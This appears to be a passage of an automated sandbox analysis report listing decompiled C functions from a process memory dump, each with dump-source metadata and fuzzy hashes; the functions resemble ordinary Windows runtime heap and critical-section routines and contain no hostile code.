            				_v8 =  *0x451d360 ^ _t25;
            				_v20 = __ecx;
            				_v46 = 0x1c26;
            				if(E04447D50() == 0) {
            					_t11 = 0x7ffe0386;
            				} else {
            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
            				}
            				_push( &_v52);
            				_push(4);
            				_push(0x402);
            				_push( *_t11 & 0x000000ff);
            				return E0446B640(E04469AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
            			}














            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b68e9203fc1de170ddd7d5b7e3255fdaabec8baddc7b6f990d406666140f2129
            • Instruction ID: 275b09cc30dc326f9025abf82cd1b852d8918e20dc71e639eddacade18f081b1
            • Opcode Fuzzy Hash: b68e9203fc1de170ddd7d5b7e3255fdaabec8baddc7b6f990d406666140f2129
            • Instruction Fuzzy Hash: 74F082B0A14258ABEF10EBA9D906E6EB3B4EF04304F04045ABA05DB391EB74F901C795
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E04424F2E(void* __ecx, char _a4) {
            				void* __esi;
            				void* __ebp;
            				void* _t17;
            				void* _t19;
            				void* _t20;
            				void* _t21;
            
            				_t18 = __ecx;
            				_t21 = __ecx;
            				if(__ecx == 0) {
            					L6:
            					__eflags = _a4;
            					if(__eflags != 0) {
            						L8:
            						E044F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
            						L9:
            						return 0;
            					}
            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
            					if(__eflags != 0) {
            						goto L9;
            					}
            					goto L8;
            				}
            				_t18 = __ecx + 0x30;
            				if(E0444C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x4401030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
            					goto L6;
            				} else {
            					return 1;
            				}
            			}










            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d94eba0a052dc5943d85a7a9c15486bf6e44b5cc25ab68ae4c1d6dd9b77ecbb0
            • Instruction ID: 6a9528b9b2dfdb79bc66076c768383978b20f61b2008ad5543b923e69032202c
            • Opcode Fuzzy Hash: d94eba0a052dc5943d85a7a9c15486bf6e44b5cc25ab68ae4c1d6dd9b77ecbb0
            • Instruction Fuzzy Hash: 93F0BE325326948FEF72EB98C580B2BB7D8AB807B8F46447BD40587A22D734F848C640
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 79%
            			E0442F358(void* __ecx, signed int __edx) {
            				char _v8;
            				signed int _t9;
            				void* _t20;
            
            				_push(__ecx);
            				_t9 = 2;
            				_t20 = 0;
            				if(E0445F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
            					_t20 = L04444620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
            				}
            				return _t20;
            			}







            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
            • Instruction ID: 1f7a607a9762c34bd9205c2750213761fabf4323d95c179501a6faad5c77a371
            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
            • Instruction Fuzzy Hash: 42E0D832A40128BBEF31A6D99E05F5BBBBCDB44B60F400156F904D7151D964AD00D6D0
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0443FF60(intOrPtr _a4) {
            				void* __ecx;
            				void* __ebp;
            				void* _t13;
            				intOrPtr _t14;
            				void* _t15;
            				void* _t16;
            				void* _t17;
            
            				_t14 = _a4;
            				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x44011a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
            					return E044F88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
            				} else {
            					return E04440050(_t14);
            				}
            			}











            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1799b27e745af56637b9975ee19fb289872fcb76b0eb49f90a000911f59fb1e9
            • Instruction ID: 86a4a3d077841b64a81f3cb9a0f260c0446c733b2d4952a6896ff8113d217768
            • Opcode Fuzzy Hash: 1799b27e745af56637b9975ee19fb289872fcb76b0eb49f90a000911f59fb1e9
            • Instruction Fuzzy Hash: 7CE0DFB0A052049FEF34DF52D040F2737989B4AB2FF19801FF8084BA02C726F885C206
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E044DD380(void* __ecx, void* __edx, intOrPtr _a4) {
            				void* _t5;
            
            				if(_a4 != 0) {
            					_t5 = L0442E8B0(__ecx, _a4, 0xfff);
            					L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
            					return _t5;
            				}
            				return 0xc000000d;
            			}





            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
            • Instruction ID: a67cb2f5a42598e0aafbb6358a8d4fa1eeda877cebf97d1fd4b5c2324e980581
            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
            • Instruction Fuzzy Hash: 8EE0C231280614BBEF225E44CC00F697B16EF407A4F204036FE089BB91CA75BC92E6C4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0445A185() {
            				void* __ecx;
            				intOrPtr* _t5;
            
            				if( *0x45167e4 >= 0xa) {
            					if(_t5 < 0x4516800 || _t5 >= 0x4516900) {
            						return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
            					} else {
            						goto L1;
            					}
            				} else {
            					L1:
            					return E04440010(0x45167e0, _t5);
            				}
            			}






            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d3c5cd4d9d140a9db2a0a717282184e9e847007597ab9e70ca7161477c836aae
            • Instruction ID: 48e9e43a14beac57cfd320297c7d80c76c922c480a1558a7a32402b8d6c34a74
            • Opcode Fuzzy Hash: d3c5cd4d9d140a9db2a0a717282184e9e847007597ab9e70ca7161477c836aae
            • Instruction Fuzzy Hash: 8BD05B611610005BFF1D7711AA58B252296F7C4719F304D0FF2076E5B6DA54FCD5E148
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E044516E0(void* __edx, void* __eflags) {
            				void* __ecx;
            				void* _t3;
            
            				_t3 = E04451710(0x45167e0);
            				if(_t3 == 0) {
            					_t6 =  *[fs:0x30];
            					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
            						goto L1;
            					} else {
            						return L04444620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
            					}
            				} else {
            					L1:
            					return _t3;
            				}
            			}






            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b98d3d5fc853f317085da18eb154e4fea6c285eb71a29400e11520034ded25bc
            • Instruction ID: 90ecc4ef76f7d6c9844c7194cbc116a20777ca65b431c726f0b5106125f69aac
            • Opcode Fuzzy Hash: b98d3d5fc853f317085da18eb154e4fea6c285eb71a29400e11520034ded25bc
            • Instruction Fuzzy Hash: A8D0A73114010053FE2D5B159804B152251EBC0789F38005EF507599E3CFA4FC92E448
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E044535A1(void* __eax, void* __ebx, void* __ecx) {
            				void* _t6;
            				void* _t10;
            				void* _t11;
            
            				_t10 = __ecx;
            				_t6 = __eax;
            				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
            					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
            				}
            				if( *((char*)(_t11 - 0x1a)) != 0) {
            					return E0443EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
            				}
            				return _t6;
            			}







            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
            • Instruction ID: 067e41fe23caa928f4755c86b03628a51c642fe40472e75fe3a85c455eab8b4d
            • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
            • Instruction Fuzzy Hash: E0D0C731551188D9DF52EF50C1347697771BF00799F5830DB9C4745573C335695AD601
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0443AAB0() {
            				intOrPtr* _t4;
            
            				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
            				if(_t4 != 0) {
            					if( *_t4 == 0) {
            						goto L1;
            					} else {
            						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
            					}
            				} else {
            					L1:
            					return 0x7ffe0030;
            				}
            			}





            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
            • Instruction ID: 9a223a90588cb4cb723421e80f81c54c5d713d74214e53a1b58d99de7840e4c1
            • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
            • Instruction Fuzzy Hash: BFD0C935352980CFDB16DF0CC554B0633A4FB44F40FC50491E400CBB21E66CE940CA00
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E044AA537(intOrPtr _a4, intOrPtr _a8) {
            
            				return L04448E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
            			}



            0x044aa553

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
            • Instruction ID: 3a1e0ff12f6f19ad0ae2ddf379d3d717577f9c4c8e34a820df722624800f6000
            • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
            • Instruction Fuzzy Hash: 9CC01236080248BBEB127E82CC00F067B2AEB94B60F108015BA080A5618632EA70EA84
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0442DB40() {
            				signed int* _t3;
            				void* _t5;
            
            				_t3 = L04444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
            				if(_t3 == 0) {
            					return 0;
            				} else {
            					 *_t3 =  *_t3 | 0x00000400;
            					return _t3;
            				}
            			}






            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
            • Instruction ID: 34efaeaf9b0a412b30e0e35b173e525d1c46d85510f88fc08cf072f548796e36
            • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
            • Instruction Fuzzy Hash: FFC08C70280A00AAFF622F20CE01B017AA0BB40B45F8400A1A300DA4F0DB7CE801EA00
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E0442AD30(intOrPtr _a4) {
            
            				return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
            			}



            0x0442ad49

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
            • Instruction ID: d89729662c105884d307b5203176510f611bb23118c6a75aa18fa6d155415027
            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
            • Instruction Fuzzy Hash: 84C08C32080248BBDB126A46CD00F017B29E790B60F000021F6040A6628A32F861D588
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E04443A1C(intOrPtr _a4) {
            				void* _t5;
            
            				return L04444620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
            			}




            0x04443a35

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
            • Instruction ID: 2cbb5289cff0d273db172ca2db76b64fba3d0e87d72a8bd2d278becd53a40b67
            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
            • Instruction Fuzzy Hash: 33C04C32180648BBDB126E46DD01F15BB69E794B60F154025B6040A9618576ED61D998
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E044536CC(void* __ecx) {
            
            				if(__ecx > 0x7fffffff) {
            					return 0;
            				} else {
            					return L04444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
            				}
            			}




            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
            • Instruction ID: c92d8aa52b46d685f79656c19717d62b9867a29e376b7dd498507bbf8dbb562a
            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
            • Instruction Fuzzy Hash: F5C09B75155440FBFF256F30CD51F1AB254F740A65F64075D7621499F1D56DBC00E504
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E044376E2(void* __ecx) {
            				void* _t5;
            
            				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
            					return L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
            				}
            				return _t5;
            			}





            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
            • Instruction ID: 9beff5037cf76d5845fbe82140e670c4ea16000f4e2586d0e58162078be51704
            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
            • Instruction Fuzzy Hash: 2CC08CB01411805AFF2A6B08CE30B223650AB0CB1AF88019DAA81296A3C368B803C208
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E04447D50() {
            				intOrPtr* _t3;
            
            				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
            				if(_t3 != 0) {
            					return  *_t3;
            				} else {
            					return _t3;
            				}
            			}





            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
            • Instruction ID: 43e774781926acd1192d65bb9c67643f124b75339c9fe6be88361a9ebfca66d7
            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
            • Instruction Fuzzy Hash: 4DB092343119408FDF16DF28C080B1633E4BB84A40B8400D1E400CBA20D329E8008900
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 53%
            			E044BFDDA(intOrPtr* __edx, intOrPtr _a4) {
            				void* _t7;
            				intOrPtr _t9;
            				intOrPtr _t10;
            				intOrPtr* _t12;
            				intOrPtr* _t13;
            				intOrPtr _t14;
            				intOrPtr* _t15;
            
            				_t13 = __edx;
            				_push(_a4);
            				_t14 =  *[fs:0x18];
            				_t15 = _t12;
            				_t7 = E0446CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
            				_push(_t13);
            				E044B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
            				_t9 =  *_t15;
            				if(_t9 == 0xffffffff) {
            					_t10 = 0;
            				} else {
            					_t10 =  *((intOrPtr*)(_t9 + 0x14));
            				}
            				_push(_t10);
            				_push(_t15);
            				_push( *((intOrPtr*)(_t15 + 0xc)));
            				_push( *((intOrPtr*)(_t14 + 0x24)));
            				return E044B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
            			}











            APIs
            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 044BFDFA
            Strings
            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044BFE2B
            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044BFE01
            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
            Similarity
            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
            • API String ID: 885266447-3903918235
            • Opcode ID: f675f86d413e9f294c89a21bfbb2b700a7c7ec23e8065898a43a5a6bc2d24274
            • Instruction ID: 451495e31ac164d5b69a4fd3091019c25ea44ab76d635bc93d1696a078738fec
            • Opcode Fuzzy Hash: f675f86d413e9f294c89a21bfbb2b700a7c7ec23e8065898a43a5a6bc2d24274
            • Instruction Fuzzy Hash: D9F0C8362001417BEE211E45DC01E63BB5AEB45734F240216F668955E1E962B83096F4
            Uniqueness

            Uniqueness Score: -1.00%